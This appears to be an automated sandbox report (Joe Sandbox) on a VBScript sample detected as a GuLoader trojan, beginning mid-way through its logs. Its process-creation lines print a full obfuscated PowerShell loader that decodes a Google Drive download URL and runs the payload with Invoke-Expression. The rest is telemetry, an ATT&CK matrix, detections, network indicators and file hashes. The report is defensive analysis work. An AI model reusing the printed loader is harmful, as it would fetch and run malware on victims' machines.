EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$storvesirerne = 1;$theologizing='substrin';$theologizing+='g';function rekordjagt($spermosphere){$tryghedsnarkomanerne=$spermosphere.length-$storvesirerne;for($ichthyocentaur=7; $ichthyocentaur -lt $tryghedsnarkomanerne; $ichthyocentaur+=(8)){$cottiers+=$spermosphere.$theologizing.invoke($ichthyocentaur, $storvesirerne);}$cottiers;}function dentagra176($nittenaarsfdselsdag){. ($systematist) ($nittenaarsfdselsdag);}$skrive=rekordjagt 'sammen mrb igttomantramzmice laireformbl chatteldiplom atilsend/skunk r5bomrker. stri.i0revalua ukrist(statuslwinadjusiaco otlnknitweadforure ofjantenwbuttonhsbrugsbe unimpainwienerste.itaxi obriqu1bstern 0kyriali.und,rda0aerodyn; ,uling paedonyw spectriallergenquadric6 ekstem4apodeme; picker femrernx ellekr6exies o4fo,film;.rontag spaan ar disenavvvesf,o:circumf1tryllek2uncompr1unimma,.volemit0rygskst)poriapr ungka lg edderkeungainlcres ectkunlyricosexolog/ovnhuse2 econce0 hummer1sirupsh0notidan0marinae1andengr0erkyndi1trkvogn diamantfnonharmilicen iruncoloueoleatesfnonumbro glasblxkasse t/ hromat1copalin2satanis1 deriva. skmtev0hegemon ';$rubys=rekordjagt ' stylteuprosecusorganisefade,urr fjogsf-tyristoaslufssygan.ideceidentitnshowtimtperi on ';$cargoliner=rekordjagt 'ast,roih rep cktslickertwindroapnonj.rasboe,neh:pra inc/estampi/mauveagduranophrmalatesistvnersv c ckiletelefon.trbaadegtornblaononreguo shoalhgbrtsejllkont.nte voltes.retstilcvatteriouncathombaadud,/paavistuinhalercbane.ak?frontene br,dsaxinvocatpv gttaaodk skoprlubricat portef=omtalerdskoleryobrevvekwdubiousnencastel valitogipsdepaunderlodcentime& undefei,adiostdcon,oci=r.kkest1bals mmmmo.dilymkatakin5ar,edtauvalentifamusivea,orelsndphl.benksaloond5statiketkuskenexb,sttelj vovehaivitaliszbewidowecarnosiyovera exald,rmajlhduninwepa.orthdaar,kahankl gjf ventili ,vaporx kanapefunmantlf ma,ked-karav nb vertishado tivv nonadvbs uljaz_quotati ';$constabless=rekordjagt ' acture> immate ';$systematist=rekordjagt 'timbresislavebaebegonerxsjofeli ';$ankyloproctia106 = rekordjagt ' h,ricoe frank comtalenhbeerbibofreedst lewist,%overtypaq,adrisp synonyp straffdserenada rav lsttorpedoa,rachio% h.plit\weekendiusketbarepicantr h erpre electopelephanl konvenabod velcakklimaegoumieracircumsbeurop mlselen gegraablenforsikreudstra s .ursyls h drum.facettesoverratubastedeceuch,or solav k&col.ack&a,gangs goitereansttemccoazervhseniorso proven contigu$apperce ';dentagra176 (rekordjagt ' subcya$journeygmeningol dsboeo su,ersb ilkombagnetacelbibliog:afpa.erhcolumbaybec amepse,plese fluorbrdoerencs lufttreforsyn naf,rismsstrygejiunrustibheldentigla rinl krni.ei draht,tfrictifyozonate=washda,(telefoncsm,dresm hermicdadoxace genvisi/.vlningcadmir l hermov$uncompoaproveninkommandk unrewoy ingva lgrimassohuje trpcowweedrlauds,nokirigamcve.denst betutoicholinea krimin1kl,nset0musikpd6intermi)pharmac ');dentagra176 (rekordjagt 'l gendi$sirrahsgreg
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$storvesirerne = 1;$theologizing='substrin';$theologizing+='g';function rekordjagt($spermosphere){$tryghedsnarkomanerne=$spermosphere.length-$storvesirerne;for($ichthyocentaur=7; $ichthyocentaur -lt $tryghedsnarkomanerne; $ichthyocentaur+=(8)){$cottiers+=$spermosphere.$theologizing.invoke($ichthyocentaur, $storvesirerne);}$cottiers;}function dentagra176($nittenaarsfdselsdag){. ($systematist) ($nittenaarsfdselsdag);}$skrive=rekordjagt 'sammen mrb igttomantramzmice laireformbl chatteldiplom atilsend/skunk r5bomrker. stri.i0revalua ukrist(statuslwinadjusiaco otlnknitweadforure ofjantenwbuttonhsbrugsbe unimpainwienerste.itaxi obriqu1bstern 0kyriali.und,rda0aerodyn; ,uling paedonyw spectriallergenquadric6 ekstem4apodeme; picker femrernx ellekr6exies o4fo,film;.rontag spaan ar disenavvvesf,o:circumf1tryllek2uncompr1unimma,.volemit0rygskst)poriapr ungka lg edderkeungainlcres ectkunlyricosexolog/ovnhuse2 econce0 hummer1sirupsh0notidan0marinae1andengr0erkyndi1trkvogn diamantfnonharmilicen iruncoloueoleatesfnonumbro glasblxkasse t/ hromat1copalin2satanis1 deriva. skmtev0hegemon ';$rubys=rekordjagt ' stylteuprosecusorganisefade,urr fjogsf-tyristoaslufssygan.ideceidentitnshowtimtperi on ';$cargoliner=rekordjagt 'ast,roih rep cktslickertwindroapnonj.rasboe,neh:pra inc/estampi/mauveagduranophrmalatesistvnersv c ckiletelefon.trbaadegtornblaononreguo shoalhgbrtsejllkont.nte voltes.retstilcvatteriouncathombaadud,/paavistuinhalercbane.ak?frontene br,dsaxinvocatpv gttaaodk skoprlubricat portef=omtalerdskoleryobrevvekwdubiousnencastel valitogipsdepaunderlodcentime& undefei,adiostdcon,oci=r.kkest1bals mmmmo.dilymkatakin5ar,edtauvalentifamusivea,orelsndphl.benksaloond5statiketkuskenexb,sttelj vovehaivitaliszbewidowecarnosiyovera exald,rmajlhduninwepa.orthdaar,kahankl gjf ventili ,vaporx kanapefunmantlf ma,ked-karav nb vertishado tivv nonadvbs uljaz_quotati ';$constabless=rekordjagt ' acture> immate ';$systematist=rekordjagt 'timbresislavebaebegonerxsjofeli ';$ankyloproctia106 = rekordjagt ' h,ricoe frank comtalenhbeerbibofreedst lewist,%overtypaq,adrisp synonyp straffdserenada rav lsttorpedoa,rachio% h.plit\weekendiusketbarepicantr h erpre electopelephanl konvenabod velcakklimaegoumieracircumsbeurop mlselen gegraablenforsikreudstra s .ursyls h drum.facettesoverratubastedeceuch,or solav k&col.ack&a,gangs goitereansttemccoazervhseniorso proven contigu$apperce ';dentagra176 (rekordjagt ' subcya$journeygmeningol dsboeo su,ersb ilkombagnetacelbibliog:afpa.erhcolumbaybec amepse,plese fluorbrdoerencs lufttreforsyn naf,rismsstrygejiunrustibheldentigla rinl krni.ei draht,tfrictifyozonate=washda,(telefoncsm,dresm hermicdadoxace genvisi/.vlningcadmir l hermov$uncompoaproveninkommandk unrewoy ingva lgrimassohuje trpcowweedrlauds,nokirigamcve.denst betutoicholinea krimin1kl,nset0musikpd6intermi)pharmac ');dentagra176 (rekordjagt 'l gendi$sirrahsgregJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts11
Command and Scripting Interpreter		221
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1425936 Sample: U00b7pdf.vbs Startdate: 15/04/2024 Architecture: WINDOWS Score: 100 19 drive.usercontent.google.com 2->19 21 drive.google.com 2->21 27 Malicious sample detected (through community Yara rule) 2->27 29 Antivirus detection for URL or domain 2->29 31 Multi AV Scanner detection for submitted file 2->31 33 Sigma detected: WScript or CScript Dropper 2->33 8 wscript.exe 2 2->8         started        signatures3 process4 signatures5 35 VBScript performs obfuscated calls to suspicious functions 8->35 37 Suspicious powershell command line found 8->37 39 Wscript starts Powershell (via cmd or directly) 8->39 41 3 other signatures 8->41 11 powershell.exe 14 18 8->11         started        process6 dnsIp7 23 drive.usercontent.google.com 142.250.72.129, 443, 49707 GOOGLEUS United States 11->23 25 drive.google.com 172.217.12.142, 443, 49706 GOOGLEUS United States 11->25 43 Potential dropper URLs found in powershell memory 11->43 45 Found suspicious powershell code related to unpacking or dynamic code loading 11->45 15 conhost.exe 11->15         started        17 cmd.exe 1 11->17         started        signatures8 process9

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
U00b7pdf.vbs16%ReversingLabsScript-WScript.Trojan.Guloader

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://drive.usercontent.googh0%Avira URL Cloudsafe
http://www.micrt.corAut0%Avira URL Cloudsafe
https://drive.googP0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
drive.google.com
172.217.12.142
truefalse
    		high
    drive.usercontent.google.com
    		142.250.72.129
    		truefalse
      		high
      windowsupdatebg.s.llnwi.net
      		68.142.107.4
      		truefalse
        		unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.compowershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1568575285.000002616FA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://drive.usercontent.google.compowershell.exe, 00000002.00000002.1544405936.0000026161671000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmptrue
              • URL Reputation: malware
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://go.micropowershell.exe, 00000002.00000002.1544405936.0000026160B8D000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1568575285.000002616FA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://drive.googPpowershell.exe, 00000002.00000002.1544405936.00000261612DC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://drive.google.compowershell.exe, 00000002.00000002.1544405936.00000261612DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCB4000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://drive.usercontent.googhpowershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://drive.usercontent.google.compowershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0E000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://drive.google.compowershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.1544405936.000002615F881000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://apis.google.compowershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1544405936.000002615F881000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.micrt.corAutpowershell.exe, 00000002.00000002.1544110626.000002615F641000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                172.217.12.142
                                		drive.google.comUnited States
                                		15169GOOGLEUSfalse
                                142.250.72.129
                                		drive.usercontent.google.comUnited States
                                		15169GOOGLEUSfalse

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1425936
                                Start date and time:2024-04-15 07:25:10 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 15s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:U00b7pdf.vbs
                                renamed because original name is a hash value
                                Original Sample Name:() 24 (240415)pdf.vbs
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winVBS@6/7@2/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 5
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 68.142.107.4
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 6500 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: U00b7pdf.vbs

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                07:26:03API Interceptor1x Sleep call for process: wscript.exe modified
                                07:26:08API Interceptor42x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                windowsupdatebg.s.llnwi.nethttps://www.renouvellement-netflix.info/login/loginGet hashmaliciousUnknownBrowse
                                • 68.142.107.4
                                https://pub-03263fcf19fc4520ae33bf72c8aca2bb.r2.dev/pick.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 68.142.107.4
                                https://netfimarketing.com/o2fa9b5aaq11814e4b398b42a0fs16bbb048.htmlGet hashmaliciousUnknownBrowse
                                • 68.142.107.4
                                https://winalertpor-error0x22908-alert-virus-detected.pages.dev/AnDrCdEr00d0CH808Err0r8An00Dr01/Get hashmaliciousUnknownBrowse
                                • 68.142.107.4
                                https://loia.co.nz/news/Get hashmaliciousUnknownBrowse
                                • 68.142.107.4
                                F5ZC1F67nf.exeGet hashmaliciousCobaltStrike, Metasploit, ReflectiveLoaderBrowse
                                • 68.142.107.4
                                F5ZC1F67nf.exeGet hashmaliciousCobaltStrikeBrowse
                                • 68.142.107.4
                                https://answer-paycustomer.com/Get hashmaliciousUnknownBrowse
                                • 68.142.107.4
                                https://enjucm-6424.anotudhoeah.workers.dev/8dc0c739-61df-4e9d-9bd9-b5bc957356bfGet hashmaliciousHTMLPhisherBrowse
                                • 68.142.107.4
                                https://liberty-d8x.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                • 68.142.107.4

                                ASNs

                                No context

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0ebU8H.exeGet hashmaliciousXWormBrowse
                                • 172.217.12.142
                                • 142.250.72.129
                                tqtYy7oBD5.exeGet hashmaliciousPureLog StealerBrowse
                                • 172.217.12.142
                                • 142.250.72.129
                                tqtYy7oBD5.exeGet hashmaliciousPureLog StealerBrowse
                                • 172.217.12.142
                                • 142.250.72.129
                                GxrG78Getq.exeGet hashmaliciousAsyncRAT, Blackshades, Quasar, StormKitty, WorldWind StealerBrowse
                                • 172.217.12.142
                                • 142.250.72.129
                                a3.cmdGet hashmaliciousUnknownBrowse
                                • 172.217.12.142
                                • 142.250.72.129
                                y60H9hymbN.exeGet hashmaliciousXWormBrowse
                                • 172.217.12.142
                                • 142.250.72.129
                                8783013BDBB0B9D9093B06792388A23ADF9E6A2A1749B.exeGet hashmaliciousDCRatBrowse
                                • 172.217.12.142
                                • 142.250.72.129
                                https://mail.accedi.45-88-90-150.cprapid.com/Get hashmaliciousPayPal PhisherBrowse
                                • 172.217.12.142
                                • 142.250.72.129
                                https://zjxcjld.com/Get hashmaliciousUnknownBrowse
                                • 172.217.12.142
                                • 142.250.72.129
                                WK6RB9ih.posh.ps1Get hashmaliciousPoshC2Browse
                                • 172.217.12.142
                                • 142.250.72.129

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                Download File
                                Process:C:\Windows\System32\wscript.exe
                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                Category:dropped
                                Size (bytes):69993
                                Entropy (8bit):7.99584879649948
                                Encrypted:true
                                SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                MD5:29F65BA8E88C063813CC50A4EA544E93
                                SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                Download File
                                Process:C:\Windows\System32\wscript.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):290
                                Entropy (8bit):2.9404395889614783
                                Encrypted:false
                                SSDEEP:6:kKZXlbN+SkQlPlEGYRMY9z+4KlDA3RUe/:xlUkPlE99SNxAhUe/
                                MD5:79564A0AF63B5B4D7F7522BAA43A4756
                                SHA1:C23F41AAD774BDD7C7A096CAC0F5306D6FB02441
                                SHA-256:D9129F79642A69E760FFA627B9AEC21DD92B324D46601ACAE642D622E9EFA8FA
